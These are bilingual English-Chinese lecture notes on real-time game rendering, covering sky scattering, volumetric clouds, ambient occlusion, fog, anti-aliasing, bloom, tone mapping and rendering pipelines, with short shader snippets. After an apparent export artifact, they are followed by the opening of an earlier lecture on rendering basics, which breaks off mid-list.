    ​瑞利散射

    webp

    • Certain directions receive more light than others, with front-back symmetry

      某些方向比其他方向接收更多的光,且呈前后对称

    • Shorter wavelengths (eg. blue) are scattered more strongly than longer wavelengths (eg.red)

      较短波长(例如蓝色)比较长波长(例如红色)散射更强烈

    webp

    Why Sky is Blue

    webp

    ​由于大气的瑞利散射,波长较短的蓝光被散射到四面八方,天空因此呈蓝色;而直射光走过更长的路径后剩下的主要是偏红的光。

    Mie Scattering

    ​米氏散射

    webp

    • Scatter light of all wavelength nearly equally

      几乎均匀地散射所有波长的光

    • Exhibit a strong forward directivity

      表现出强烈的前向方向性

    Mie Scattering Equation

    webp

    Mie Scattering in Daily Life

    ​日常生活中的米氏散射

    webp

    • Exhibit a strong forward directivity (halo effects around sun)

      表现出强烈的前向方向性(太阳周围的光晕效应)

    • Scatter light of all wavelength nearly equally (fog effects)

      几乎均匀地散射所有波长的光(雾效应)

    Variant Air Molecules Absorption

    ​不同的空气分子吸收

    webp

    • Ozone (O3)
      Absorb strongly at longer wavelengths to filter out the reds, oranges, yellows

      强烈吸收较长波长,滤除红色、橙色、黄色

    • Methane (CH4)

      Well-known for absorbing red light

      以吸收红光而闻名

    Single Scattering vs. Multi Scattering

    webp

    $$L_1=\int_A^B L_{P\to A}\,ds$$

    webp

    $$L_{n+1}=\int_{A}^{B}\int_{4\pi}L_{n}(p,v^{\prime})\cdot S(\lambda,\theta,h)\cdot T(p\to A)\,dv^{\prime}ds$$

    webp

    Ray Marching

    • Ray marching is a popular method to integrate function along a path

      光线步进(ray marching)是一种沿路径对函数积分的常用方法

    • We use ray marching to calculate final radiance for a given point by single scattering

      我们用光线步进,通过单次散射计算给定点的最终辐亮度

    • The integrated radiance is usually stored in look-up tables (LUT)

      积分得到的辐亮度通常存储在查找表(LUT)中(下面给出单次散射光线步进的骨架示意)

    webp
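
    ​单次散射的光线步进骨架如下(GLSL 示意;假设介质均匀、只有一个方向光,向太阳方向的透射率来自预计算 LUT):

    uniform vec3  sunRadiance;  // 假设:太阳入射辐亮度
    uniform float sigmaT;       // 假设:均匀消光系数
    uniform float sigmaS;       // 假设:均匀散射系数
    uniform float phase;        // 假设:固定的相位函数值

    float sunTransmittance(vec3 p); // 假设的查询:p 点到太阳的透射率(来自 LUT)

    vec3 singleScattering(vec3 ro, vec3 rd, float dist, int steps)
    {
        float dt = dist / float(steps);
        float T  = 1.0;          // 视线方向的累计透射率
        vec3  L  = vec3(0.0);
        for (int i = 0; i < steps; ++i)
        {
            vec3 p = ro + rd * (float(i) + 0.5) * dt;
            L += T * sigmaS * phase * sunRadiance * sunTransmittance(p) * dt; // 内散射
            T *= exp(-sigmaT * dt);                                           // 衰减
        }
        return L;
    }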

    Precomputed Atmospheric Scattering

    ​预先计算的大气散射

    webp

    webp

    webp

    Challenges of Precomputed Atmospheric Scattering

    ​预计算大气散射的挑战

    • Precomputation Cost

      预计算成本

      • Multi-scattering iterations are very expensive

        多次散射迭代非常昂贵

      • Hard to generate atmosphere LUT on low-end devices (ie. mobile)

        难以在低端设备(如移动设备)上生成大气 LUT

    • Authoring and Dynamic Adjustment of Environments

      环境的创作和动态调整

      • Artist can’t change scattering coefficients on the fly

        艺术家无法即时更改散射系数

      • Hard to render effects like weather from sunny to rain fog, space travel among planets

        难以渲染天气从晴朗到雨雾、行星间太空旅行等效果

    • Runtime Rendering Cost

      运行时渲染成本

      • Expensive per-pixel multi high dimensional texture sampling for transmittance LUT and multi scattering LUT (always need to down-sample for efficiency)

        昂贵的每像素多高维纹理采样,用于透射 LUT 和多散射 LUT(始终需要下采样以提高效率)

    Production Friendly Quick Sky and Atmosphere Rendering

    ​制作友好的快速天空和大气渲染

    webp

    webp

    $$\begin{aligned}
    &G_{n+1}=G_{n}\cdot f_{ms} \\
    &F_{ms}=1+f_{ms}+f_{ms}^{2}+f_{ms}^{3}+\cdots=\frac{1}{1-f_{ms}} \\
    &\Psi_{ms}=L_{2^{nd}\,order}\cdot F_{ms}
    \end{aligned}$$

    Simplify Multi-scattering Assumption

    ​简化多重散射假设

    • Scattering events with order greater or equal to 2 are executed using an isotropic phase function

      使用各向同性相位函数执行阶数大于或等于 2 的散射事件

    • All points within the neighborhood of the position we currently shade receive the same amount of second order scattered light

      当前着色位置邻域内的所有点接收相同量的二阶散射光

    • Visibility is ignored

      忽略可见性

    webp

    Fixed view position and sun position to remove 2 dimensions out of LUT

    ​固定视点位置和太阳位置,从而从 LUT 中去掉两个维度

    webp

    • Generated a 3D LUT to evaluate aerial-perspective effects by ray marching

      生成 3D LUT 以通过光线行进评估空气透视效果

    Good Balance of Performance and Effect

    ​性能与效果的良好平衡

    webp

    “Paint” Cloud

    Cloud Type

    webp

    ​云被分成了这么多种。

    Mesh-Based Cloud Modeling

    ​基于网格的云建模

    webp

    Pros

    • High quality

      高质量

    Cons

    • Overall expensive

      代价高

    • Do not support dynamic weather

      不支持动态天气

    Billboard Cloud

    webp

    ​早期游戏使用贴图描述云。

    Pros

    • Efficient

      高效的

    Cons

    • Limited visual effect

      视觉效果有限

    • Limited cloud type

      有限的云类型

    Volumetric Cloud Modeling

    ​体积云建模

    webp

    Pros

    • Realistic cloud shapes

      逼真的云形状

    • Large scale clouds possible

      可以表现大规模的云

    • Dynamic weather supported

      支持动态天气

    • Dynamic volumetric lighting and shadowing

      动态体积照明和阴影

    Cons

    • Efficiency must be considered

      必须考虑效率

    Weather Texture

    webp

    Noise Functions

    webp

    Cloud Density Model

    webp

    Rendering Cloud by Ray Marching

    webp

    第七节:游戏中渲染管线、后处理和其他的一切

    Ambient Occlusion

    ​环境光遮蔽

    webp

    ​环境光遮蔽(Ambient Occlusion)是一种计算机图形学中的技术,用于模拟光线在环境中传播时,由于物体之间的遮挡而导致的阴影效果。它可以增强场景的真实感和细节,使得物体之间的联系更加紧密。

    ​简单来说,环境光遮蔽就是在渲染场景时,考虑物体表面在环境光照射下的遮挡情况,对每个像素点进行采样,并计算出该像素点受到的周围物体的影响程度,最终得到一张带有阴影效果的图像。

    • Approximation of attenuation of ambient light due to occlusion

      由于遮挡而导致的环境光衰减的近似值

    webp

    Precomputed AO

    Using ray tracing to compute the AO offline and store the result into texture, which is widely used in object modeling process

    ​利用光线追踪离线计算 AO 并将结果存储到纹理中,广泛应用于物体建模过程。(空间换时间)

    • Extra storage cost

      额外的存储费用

    • Only apply to static object

      仅适用于静态对象

    webp

    Screen Space Ambient Occlusion (SSAO)

    ​屏幕空间环境光遮挡(SSAO)

    webp

    webp

    • Generate $N$ random samples in a sphere around each pixel $p$ in view space

      在视图空间中,围绕每个像素 $p$ 的球体内生成 $N$ 个随机样本

    • Test sample occlusions by comparing depth against depth buffer

      通过将深度与深度缓冲区进行比较来测试样本遮挡

    • Average visibility of sample points to approximate AO

      对采样点的可见性取平均来近似 AO(核心循环示意见下)
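
    ​核心循环大致如下(GLSL 示意;假设深度纹理存的是 view 空间线性深度,且深度值越大离相机越远):

    uniform sampler2D linearDepthTex; // 假设:view 空间线性深度
    uniform vec3 samples[64];         // 预生成的单位球内随机向量
    uniform mat4 proj;

    float ssao(vec3 viewPos, float radius)
    {
        float occlusion = 0.0;
        for (int i = 0; i < 64; ++i)
        {
            vec3 p = viewPos + samples[i] * radius; // 球内采样点
            vec4 clip = proj * vec4(p, 1.0);
            vec2 uv = clip.xy / clip.w * 0.5 + 0.5;
            float sceneDepth = texture(linearDepthTex, uv).r;
            if (sceneDepth < p.z)                   // 场景表面更近:采样点被遮挡
                occlusion += 1.0;
        }
        return 1.0 - occlusion / 64.0;              // 可见样本的比例即 AO 因子
    }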

    SSAO+

    webp

    • Recall the AO equation is actually done on the normal-oriented hemisphere

      回想一下,AO 方程实际上是在沿法线方向的半球上计算的

    ​于是对 SSAO 进行改进,只在半球上采样。

    webp

    ​效果看上去更好了,但是还有些问题,比如水泥墩子后面有不合理的阴影。

    HBAO - Horizon-based Ambient Occlusion

    ​HBAO - 基于水平角(horizon)的环境光遮蔽

    webp

    • Use the depth buffer as a heightfield on 2D surface

      使用深度缓冲区作为 2D 表面上的高度场

    • Rays that below the horizon angle are occluded

      低于水平角的光线被遮挡

    HBAO Implementation

    ​HBAO 的实现

    webp

    • Use the depth buffer as a heightfield on 2D surface

      使用深度缓冲区作为 2D 表面上的高度场

    • Trace rays directly in 2D and approximate AO from horizon angle

      直接在 2D 中追踪光线并从水平角近似 AO

    GTAO - Ground Truth-based Ambient Occlusion

    ​GTAO - 基于地面实况的环境光遮挡

    webp

    GTAO introduces the missing cosine factor, removes the attenuation function, and add a fast approximation of multi bounce

    ​GTAO 引入了缺失的余弦因子,去除了衰减函数,并添加了多次反射的快速近似

    Add multiple bounces by fitting a cubic polynomial per albedo

    ​通过拟合每个反照率的三次多项式来添加多次反射

    webp

    Ray-Tracing Ambient Occlusion

    ​光线追踪环境光遮挡

    webp

    • Casting rays from each screen pixel using RTT hardware

      使用 RTT 硬件从每个屏幕像素投射光线

      • 1 spp (sample per pixel) works well for far-field occlusion

        1 spp(每像素 1 个样本)即可很好地处理远场遮挡

      • With 2-4spp, can recover detailed occlusion in contact region

        使用 2-4spp,可以恢复接触区域的详细遮挡

    Fog Everything

    Depth Fog

    Linear fog: 线性雾

    • factor = (end-z)/(end-start)

    Exp fog: 指数雾

    • factor = exp(- density * z)

    Exp squared fog: 指数平方雾

    • factor = exp(-(density * z) ^ 2)

    webp
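
    ​这三种雾因子可以直接写成(GLSL 示意;factor 为 1 表示无雾,0 表示完全被雾覆盖):

    float linearFog(float z, float start, float end)
    {
        return clamp((end - z) / (end - start), 0.0, 1.0);
    }

    float expFog(float z, float density)
    {
        return exp(-density * z);
    }

    float expSquaredFog(float z, float density)
    {
        float d = density * z;
        return exp(-d * d);
    }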

    Height Fog

    ​Height Fog(高度雾)是一种计算机图形学中的特效,可以模拟出真实世界中的大气层的效果。它通常被应用于游戏、电影等场景中,用于增强场景的逼真度和氛围感。

    ​在 Height Fog 中,雾的浓度与高度成正比。也就是说,离地面越远的区域,雾的浓度越大,从而形成了逐渐模糊、逐渐淡化的效果。同时,Height Fog 还可以调整雾的颜色、密度、高度等参数,以达到不同的视觉效果。

    ​Height Fog 主要用于模拟自然环境中的大气层效果,例如山区、森林、海洋等场景。通过 Height Fog 的渲染,可以使得场景更加真实、自然,并且能够增强场景的情感和氛围感。

    webp

    • Height Fog integration along view direction

      沿视线方向对高度雾积分

      $\mathrm{D(h)=D_{max}\cdot e^{-\sigma\cdot max(h-H_s,0)}}$

      FogDensityIntegration

      雾密度积分

      $$\begin{aligned}&=D_{max}\cdot d\int_{0}^{1}e^{-\sigma\cdot\max(v_{z}+t\cdot d_{z}-H_{s},0)}dt \\&=D_{max}\cdot d\cdot e^{-\sigma\cdot\max(v_{z}-H_{s},0)}\cdot\frac{1-e^{-\sigma\cdot d_{z}}}{\sigma\cdot d_{z}}\end{aligned}$$

    • Fog color after transmission

      传输后的雾色

      $$\text{FogInscatter}=1-e^{-\text{FogDensityIntegration}}$$

      $$\text{FinalColor}=\text{FogColor}\cdot\text{FogInscatter}$$

    Voxel-based Volumetric Fog

    ​Voxel-based Volumetric Fog(基于体素的体积雾)是一种计算机图形学中的高级渲染技术。它通过将场景划分成小立方体(体素),并对每个体素进行采样和计算,从而模拟出真实世界中的体积雾效果。

    webp

    Anti-aliasing

    ​反走样

    Reason of Aliasing

    webp

    • Aliasing is a series of rendering artifact which is caused by high-frequency signal vs. insufficient sampling of limited rendering resolutions

      走样是由高频信号与有限渲染分辨率的采样不足引起的一系列渲染伪影

    Anti-aliasing

    webp

    The general strategy of screen-based antialiasing schemes is using a sampling pattern to get more samples and then weight and sum samples to produce a pixel color

    ​基于屏幕的抗锯齿方案的一般策略是使用采样模式获取更多样本,然后对样本进行加权和求和以生成像素颜色

    Super-sample AA (SSAA) and Multi-sample AA (MSAA)

    ​超样本 AA (SSAA) 和多样本 AA (MSAA)

    • Super sampling is the most straightforward solution to solve AA

      超采样是解决走样最直接的方案

    webp

    SSAA: 4x rendering resolution

    ​SSAA:4 倍渲染分辨率

    4x z-buffer and framebuffer

    ​4x z-缓冲区和帧缓冲区

    4x rasterization and pixel shading

    ​4x 光栅化和像素着色

    webp

    MSAA, only multi-sampling necessary pixels

    ​MSAA,仅多重采样必要的像素

    4x z-buffer and framebuffer

    ​4x z-缓冲区和帧缓冲区

    4x rasterization and 1+ x pixel shading

    ​4x 光栅化和 1+x 像素着色

    FXAA (Fast Approximate Anti-aliasing)

    ​FXAA(快速近似抗锯齿)

    webp

    // M: luminance of the middle pixel
    // (L = 0.299 * R + 0.587 * G + 0.114 * B)

    #define MinThreshold 0.05

    float MaxLuma = max(max(max(N, E), max(W, S)), M);
    float MinLuma = min(min(min(N, E), min(W, S)), M);
    float Contrast = MaxLuma - MinLuma;
    if (Contrast >= MinThreshold)
        ...

    Anti-aliasing based on 1x rendered image

    ​基于 1x 渲染图像的抗锯齿

    • Find edge pixels by luminance

      通过亮度查找边缘像素

    • Compute offset for every edge pixel

      计算每个边缘像素的偏移量

    • Re-sample edge pixel by its offset to blend with a neighbor

      通过偏移量重新采样边缘像素以与邻居混合

    Compute Offset Direction

    ​计算偏移方向

    webp

    Edge Searching Algorithm

    ​边缘搜索算法

    webp

    • Find aliasing edge that the pixel is in

      查找像素所在的锯齿边缘

      • Record constrast luminance and average luminance of current pixel and offset pixel

        记录当前像素和偏移像素的对比度亮度和平均亮度

        $L_{avg}\quad L_{contrast}$

      • Search along the 2 perpendicular direction and calculate the average luminance

        沿 2 垂直方向搜索并计算平均亮度

        $L_{edge1n}\quad L_{edge2n}$

      • Until $\text{abs}(L_{edge1n}-L_{current})>0.25L_{contrast}$ or $\text{abs}(L_{edge2n}-L_{current})>0.25L_{contrast}$

    Calculate Blend Coefficient

    ​计算混合系数

    webp

    • Compute blend coefficient

      计算混合系数

    targetP is the nearer edge end of CurrentP

    ​targetP 是距 CurrentP 较近的那个边缘端点

    if ((L_avg - L_current) * (L_avg - L_targetP) > 0)
        magnitude = 0;
    else
        magnitude = abs(0.5 - dst / edgeLength);

    Blend Nearby Pixels

    ​混合附近的像素

    • Compute blender coefficient

    webp

    PixelNewColor = Texture(CurrentP_UV + offset_direction * offset_magnitude)

    FXAA Result

    webp

    TAA (Temporal Anti-aliasing)

    ​TAA(时域抗锯齿)

    webp

    Utilize spatial-temporal filtering methods to improve AA stability in motion

    ​利用时空滤波方法提高运动中抗锯齿的稳定性

    webp

    Post-process

    But, the real magic in Post-process…

    ​图像后处理,数字图像处理领域。

    webp

    Post-process in 3D Graphics refers to any algorithm that will be applied to the final image. It can be done for stylistic reasons (color correction, contrast, etc.) or for realistic reasons (tone mapping, depth of field, etc.)

    ​3D 图形中的后处理是指应用于最终图像的任何算法。它可以出于风格化的原因(色彩校正、对比度等)或写实的原因(色调映射、景深等)来做。

    Bloom Effect

    What is Bloom

    webp

    • The physical basis of bloom is that, in the real world, lenses can never focus perfectly

      光晕的物理基础是,在现实世界中,镜头永远无法完美对焦

    • Even a perfect lens will convolve the incoming image with an Airy disk

      即使是完美的镜头,也会把入射图像与艾里斑(Airy disk)做卷积

    Detect Bright Area by Threshold

    ​使用阈值法检测发光区域

    webp

    Find Luminance (Y) apply the standard coefficients for sRGB:

    ​查找亮度 (Y),应用 sRGB 的标准系数:

    $$Y=R_{lin}*0.2126+G_{lin}*0.7152+B_{lin}*0.0722$$

    float threshold;
    float4 computeHighlightArea()
    {
        [...] // first do normal lighting calculations and output results
        float4 scene_color = float4(lighting, 1.0f);
        // check whether fragment output is higher than threshold, if so output as highlight color
        float luminance = dot(scene_color.rgb, float3(0.2126f, 0.7152f, 0.0722f));

        float4 highlight_color = float4(0.0f, 0.0f, 0.0f, 1.0f);
        if (luminance > threshold)
            highlight_color = float4(scene_color.rgb, 1.0f);
        return highlight_color;
    }

    Gaussian Blur

    webp

    ​使用二维正态分布的卷积核进行卷积作高斯模糊。
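
    ​利用高斯核可分离的性质,通常拆成水平、垂直两个 pass,各做一次一维卷积(GLSL 示意;5 tap 权重为常见的近似值):

    uniform sampler2D src;
    uniform vec2 texelStep; // 水平 pass 传 (1/width, 0),垂直 pass 传 (0, 1/height)

    vec3 gaussianBlur1D(vec2 uv)
    {
        const float w[3] = float[](0.227027, 0.316216, 0.070270);
        vec3 c = texture(src, uv).rgb * w[0];
        for (int i = 1; i <= 2; ++i)
        {
            c += texture(src, uv + texelStep * float(i)).rgb * w[i];
            c += texture(src, uv - texelStep * float(i)).rgb * w[i];
        }
        return c;
    }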

    Pyramid Gaussian Blur

    ​金字塔高斯模糊

    webp

    We can’t do all that filtering at high resolution, so we need a way to downsample and upsample the image

    ​我们无法以高分辨率进行所有过滤,因此我们需要一种对图像进行下采样上采样的方法

    Need a weight coefficient to tweak final effect

    ​需要一个权重系数来调整最终效果

    Bloom Composite

    ​混合形成 Bloom 效果。

    webp

    webp

    Tone Mapping

    ​色调映射

    webp

    • No way to directly display HDR image in a SDR device

      无法在 SDR 设备中直接显示 HDR 图像

    • The purpose of the Tone Mapping function is to map the wide range of high dynamic range (HDR) colors into standard dynamic range (SDR) that a display can output

      色调映射功能的目的是将各种高动态范围 (HDR) 颜色映射到显示器可以输出的标准动态范围 (SDR)

    Tone Mapping Curve

    ​色调映射曲线

    webp

    float3 F(float3 x)
    {
        const float A = 0.22f;
        const float B = 0.30f;
        const float C = 0.10f;
        const float D = 0.20f;
        const float E = 0.01f;
        const float F = 0.30f;
        return ((x * (A * x + C * B) + D * E) / (x * (A * x + B) + D * F)) - E / F;
    }

    float3 Uncharted2ToneMapping(float3 color, float adapted_lum)
    {
        const float WHITE = 11.2f;
        return F(1.6f * adapted_lum * color) / F(WHITE);
    }
    • Get a filmic look without making renders dirty

      获得电影般的外观而不会使渲染变脏

    • Give images proper contrast and nicely roll off any pixels over 1

      为图像提供适当的对比度,并让超过 1 的像素平滑地衰减(roll off)

    ACES

    webp

    ​Academy Color Encoding System(ACES)是一种由美国电影艺术与科学学会(Academy of Motion Picture Arts and Sciences)开发的颜色管理系统。它旨在提供一种标准化的数字图像工作流程,以便在不同的硬件和软件平台上保持一致的颜色表现和图像质量。

    ​ACES 的主要目标是解决数字媒体制作中的颜色管理问题,确保从拍摄到后期制作再到最终呈现的整个过程中,颜色能够被准确和一致地处理。ACES 采用高动态范围(HDR)和广色域的工作方式,可以捕捉和表现更丰富的颜色和亮度细节。

    • Academy Color Encoding System

      学院颜色编码系统

      • Primarily for Film & Animation

        主要用于电影和动画

      • Interesting paradigms and transformations

        有趣的范例和转变

    • The useful bits

      有用的部分

      • Applying Color Grading in HDR is good

        在 HDR 中应用颜色分级效果很好

      • The idea of a fixed pipeline up to the final ODT (Output Device Transform) stage is good

        在最终 ODT(输出设备变换)阶段之前使用固定管线的想法很好

        • Separates artistic intent from the mechanics ofsupporting different devices

          将艺术意图与支持不同设备的机制分开

    HDR and SDR Pipeline

    ​HDR 和 SDR 管道

    webp

    • Visual consistency between HDR / SDR

      HDR / SDR 之间的视觉一致性

    • Similar SDR results to previous SDR color pipeline

      与之前的 SDR 颜色管道类似的 SDR 结果

    • High quality

      高质量

    • High performance

      高性能

    • Minimal disruption to art teams

      对艺术团队的干扰最小化

      • Simple transition from current color pipeline

        从当前颜色管道简单过渡

      • Minimal additional overhead for mastering HDR and SDR

        掌握 HDR 和 SDR 的额外开销最小

    Tone Mapping Curve Comparison

    ​色调映射曲线比较

    webp

    Color Grading

    ​颜色分级

    webp

    Lookup Table (LUT)

    ​查找表 (LUT)

    webp

    • LUT is used to remap the input color values of source pixels to new output values based on data contained within the LUT

      LUT 用于根据 LUT 中包含的数据将源像素的输入颜色值重新映射到新的输出值

    • A LUT can be considered as a kind of color preset that can be applied to image or footage

      LUT 可以被视为一种可应用于图像或素材的颜色预设(采样方式见下方示意)
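
    ​运行时应用 3D LUT 只是一次归一化加一次三维纹理采样(GLSL 示意;lutSize 常见取 16/32/64):

    uniform sampler3D colorLUT;
    uniform float lutSize;

    vec3 applyColorGrading(vec3 color)
    {
        // 把 [0,1] 颜色映射到纹素中心,避免边界处的插值偏差
        vec3 uvw = color * (lutSize - 1.0) / lutSize + 0.5 / lutSize;
        return texture(colorLUT, uvw).rgb;
    }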

    LUT 3D or 2D

    webp

    Artist Friendly Tools

    ​PS 之类的软件都可以创建 LUT。

    webp

    webp

    Color grading is the most cost-effective feature of game rendering

    ​颜色分级是游戏渲染中最具成本效益的功能

    Rendering Pipeline

    ​回顾一下渲染管线。

    One Equation for Everything

    webp

    What We Learned about Rendering (1/4)

    webp

    What We Learned about Rendering (2/4)

    webp

    What We Learned about Rendering (3/4)

    webp

    What We Learned about Rendering (4/4)

    webp

    Rendering Pipeline

    webp

    • Rendering pipeline is the management order of all rendering operation execution and resource allocation

      渲染管线是所有渲染操作执行和资源分配的管理顺序

    Forward Rendering

    for n meshes
        for m lights
            color += shading(mesh, light)

    ​按顺序渲染。

    webp

    Sort and Render Transparent after Opaque Objects

    webp

    ​渲染透明物体在不透明物体之后进行。

    Rendering with Many Lights

    ​渲染多个光。

    Deferred Rendering

    延迟渲染

    webp

    webp
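
    ​与上面前向渲染的伪代码对应,延迟渲染把几何和光照拆成两个 pass(示意):

    // geometry pass:逐网格写入 G-Buffer
    for n meshes
        write GBuffer(albedo, normal, depth, ...)

    // lighting pass:逐像素读 G-Buffer,再逐光源累加
    for each pixel
        for m lights
            color += shading(GBuffer(pixel), light)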

    Pros

    • Lighting is only computed for visible fragments

      仅针对可见片段计算光照

    • The data from the G-Buffer can be used for post-processing

      G-Buffer 中的数据可用于后处理

    Cons

    • High memory and bandwidth cost

      高内存和带宽成本

    • Not supporting transparent objects

      不支持透明物体

    • Not friendly to MSAA

      对 MSAA 不友好

    Tile-based Rendering

    ​Tile-based Rendering(基于块的渲染)是一种在计算机图形学中常用的渲染技术。它通过将图像划分为小块(瓦片),并对每个瓦片进行独立的渲染,从而提高渲染效率和性能。

    ​在传统的全局渲染方法中,整个场景的几何体和纹理都需要被完整地装入显存中,并在每个像素上进行计算。这会导致内存和计算资源的浪费,尤其在处理复杂的场景时更加明显。而 Tile-based Rendering 则针对这个问题进行了优化。

    ​Tile-based Rendering 首先将场景划分为小块,每个块可以是一个像素或者更大的区域。然后,它只对可见的块进行处理,即只渲染那些对最终图像有贡献的部分。这样一来,渲染引擎可以专注于处理可见区域,减少了不必要的计算和内存访问操作。

    webp

    Light Culling by Tiles

    webp

    Depth Range Optimization

    ​深度范围优化

    webp

    • Get Min/Max depth per tile from Pre-z pass

      从 Pre-z pass 获取每个图块的最小/最大深度

    • Test depth bounds for each light

      测试每个灯的深度范围

    Tile-based Deferred Rendering

    webp

    Forward+ (Tile-based Forward) Rendering

    ​Forward+(基于图块的前向)渲染

    webp

    • Depth prepass (prevent overdraw / provide tile depth bounds)

      深度预通道(防止过度绘制/提供图块深度边界)

    • Tiled light culling (output: light list per tile)

      平铺灯光剔除(输出:每个平铺的灯光列表)

    • Shading per object (PS: iterate through light list calculated in light culling)

      逐对象着色(PS:遍历光剔除阶段计算出的灯光列表)

    Cluster-based Rendering

    ​Cluster-based Rendering(基于簇的渲染)是 Tile-based 思路在深度方向上的推广:除了把屏幕划分成图块,还沿深度把视锥体切成一个个三维的簇(cluster)。

    ​灯光剔除按簇进行,每个簇记录影响它的灯光列表;着色时,像素根据自己所在的簇直接取用该列表。

    ​相比只按屏幕图块划分,深度方向的细分可以更精确地剔除灯光,特别适合深度跨度大的场景。

    webp

    Visibility Buffer

    webp

    Real Rendering Pipeline

    webp

    Challenges

    webp

    • Complex parallel work needs to synchronize with complex resource dependency

      复杂的并行工作需要与复杂的资源依赖同步

    • Large amount of transient resource whose lifetime is shorter than one frame

      大量瞬态资源,其生命周期短于一帧

    • Complex resource state management

      复杂的资源状态管理

    • Exploit newly exposed GPU features without extensive user low level knowledge

      无需广泛的用户低级知识即可利用新公开的 GPU 功能

    Frame Graph

    webp

    A Directed Acyclic Graph (DAG) of pass and resource dependency in a frame, not a real visual graph

    ​帧中通道和资源依赖关系的有向无环图 (DAG),而不是真正的可视化图

    Render to Monitor

    ​渲染到显示器

    Screen Tearing

    ​Screen Tearing(屏幕撕裂)是一种在计算机和视频游戏中常见的图像问题。它通常出现在快速移动或相机旋转等情况下,导致图像出现水平分割线或不协调的图案,影响观看体验。

    ​Screen Tearing 的出现是由于显示器和 GPU 之间的同步问题。当 GPU 在渲染新帧时,如果显示器正在显示先前的帧,就会发生 Screen Tearing。这是因为显示器和 GPU 的帧速率不同步,导致部分新帧和部分旧帧同时显示在屏幕上,从而产生撕裂的效果。

    ​解决 Screen Tearing 的方法包括垂直同步(V-sync)和自适应同步(Adaptive-Sync)。垂直同步是一种通过锁定 GPU 的输出速度来匹配显示器的刷新速率的技术。它可以防止屏幕撕裂,但可能会导致输入延迟和帧率下降。自适应同步则是一种更高效的技术,它可以根据 GPU 的输出动态地调整显示器的刷新速率,以匹配 GPU 的速度,从而消除屏幕撕裂并保持更平滑的画面。

    webp

    In most games your GPU frame rate will be highly volatile

    ​在大多数游戏中,您的 GPU 帧速率会非常不稳定

    When new GPU frame updates in the middle of last screen frame, screen tearing occurrs

    ​当新的 GPU 帧在最后一个屏幕帧的中间更新时,屏幕撕裂发生

    V-Sync Technology

    webp

    Synchronizing buffer swaps with the Vertical refresh is called V-sync

    ​将缓冲区交换与垂直刷新同步称为 V-sync

    V-Sync can be used to prevent tearing, but framerates are reduced, the mouse lags, and stuttering ruins gameplay

    ​垂直同步可用于防止撕裂,但帧速率会降低,鼠标会出现滞后和卡顿,从而破坏游戏玩法

    Variable Refresh Rate

    ​可变刷新率(Variable Refresh Rate,VRR)是一种显示技术,用于动态调整显示器的刷新率,以匹配输入信号的帧率。传统的显示器通常以固定的刷新率(例如 60Hz 或 120Hz)工作,但 VRR 技术允许显示器根据实际的帧率来动态调整刷新率。

    ​VRR 技术最常见的实现是 AMD 的 FreeSync 和 NVIDIA 的 G-Sync。当显示器采用 VRR 技术时,它可以与图形处理单元(GPU)通信,以了解当前帧率,并相应地调整自己的刷新率。这意味着在低帧率情况下,显示器可以减少刷新率,而在高帧率情况下,可以增加刷新率,从而实现更流畅的画面表现。

    webp

    ]]>
    + 资源

    课程

    第四节:游戏引擎中的渲染实践

    Rendering on Game Engine

    Rendering System in Games

    webp

    ​游戏渲染发展历程。

    Q: Is there any game without rendering?

    ​有。比如文字游戏。

    Rendering on Graphics Theory

    • Objects with one type of effect

      具有一种效果的对象

    • Focus on representation and math correctness

      注重表示和数学正确性

    • No strict performance requirement

      无严格的性能要求

      • Realtime (30 FPS) / interactive (10 FPS)

        实时 (30 FPS) / 交互式 (10 FPS)

        对于游戏来说,应保证游戏画面流畅

      • offline rendering

        离线渲染(无法实时渲染,如电影,海报等,画质好)

      • Out-of-core rendering

        核外渲染

    Challenges on Game Rendering (1/4)

    webp

    Tens of thousands of objects with dozens type of effects

    ​数万个物体,数十种效果。容易跑不动。

    Challenges on Game Rendering (2/4)

    webp

    Deal with architecture of modern computer with a complex combination of CPU and GPU

    ​处理具有 CPU 和 GPU 复杂组合的现代计算机体系结构。(设计游戏引擎时,要考虑 CPU 和 GPU 的架构来写代码)

    Challenges on Game Rendering (3/4)

    webp

    Commit a bullet-proof framerate

    ​保证帧率

    • 30 FPS (60 FPS,120 FPS + VR)

    • 1080P, 4K and 8K resolution

    ​现在对游戏的分辨率和帧率要求越来越高了。

    Challenges on Game Rendering (4/4)

    • Limit access to CPU bandwidth and memory footprint

      限制对 CPU 带宽和内存占用的访问

    • Game logic, network, animation, physics and AI systems are major consumers of CPU and main memory

      游戏逻辑、网络、动画、物理和人工智能系统是 CPU 和主存的主要消耗者

    Rendering on Game Engine

    A heavily optimized practical software framework to fulfill the critical rendering requirements of games on modern hardware (PC, console and mobiles)

    ​高度优化的实用软件框架,可满足现代硬件(PC、游戏机和移动设备)上游戏的关键渲染要求

    Outline of Rendering

    ​本课程主要介绍的渲染技术,仅是蜻蜓点水,这玩意太复杂了。

    1. Basics of Game Rendering

      游戏渲染基础知识

      • Hardware architecture

        硬件架构

      • Render data organization

        渲染数据组织

      • Visibility

        可见性

    2. Materials, Shaders and Lighting

      材质、着色器和光照

      • PBR (SG, MR)

        PBR(SG、MR)

      • Shader permutation

        着色器排列

      • Lighting

        灯光

        • Point / Directional lighting

          点/定向照明

        • IBL / Simple GI

          IBL / 简单 GI

    3. Special Rendering

      特殊渲染

      • Terrain

        地形

      • Sky / Fog

        天空/雾

      • Postprocess

        后期处理

    4. Pipeline

      管道

      • Forward, deferred rendering, forward plus

        前向、延迟渲染、前向加号

      • Real pipeline with mixed effects

        具有混合效果的真实管道

      • Ring buffer and V-Sync

        环形缓冲区和垂直同步

      • Tile-based rendering

        基于平铺的渲染

    What Is Not Included

    • Cartoon Rendering

      卡通渲染(非真实渲染)

    • 2D Rendering Engine

      二维渲染引擎(三渲二)

    • Subsurface

      皮肤

    • Hair /Fur

      头发 / 皮毛

    Building Blocks of Rendering

    ​渲染的构建块

    Rendering Pipeline and Data

    ​渲染管道及数据

    webp

    ​图像的渲染过程。从 GAMES101 里搬来的图。

    Tens of millions of pixels, each with hundreds of ALU operations and dozens of texture samplings.

    ​数千万像素,数百个 ALU 和数十个纹理采样。

    Computation - Projection and Rasterization

    ​计算-投影和光栅化

    webp

    Computation - Shading

    ​计算-着色

    ​写的 Shader 在显卡中存储/计算。

    webp

    A shader sample code

    ​着色器示例代码

    • Constants /Parameters

      常量/参数

    • ALU algorithms

      ALU 算法

    • Texture Sampling

      纹理采样

    • Branches

      分支

    Computation - Texture Sampling

    ​计算-纹理采样

    webp

    • Step 1

      Use the two nearest mipmap levels

      使用两个最近的 mipmap 级别

    • Step 2

      Perform bilinear interpolation in both mip-maps

      在两个 mip-map 中执行双线性插值

    • Step 3

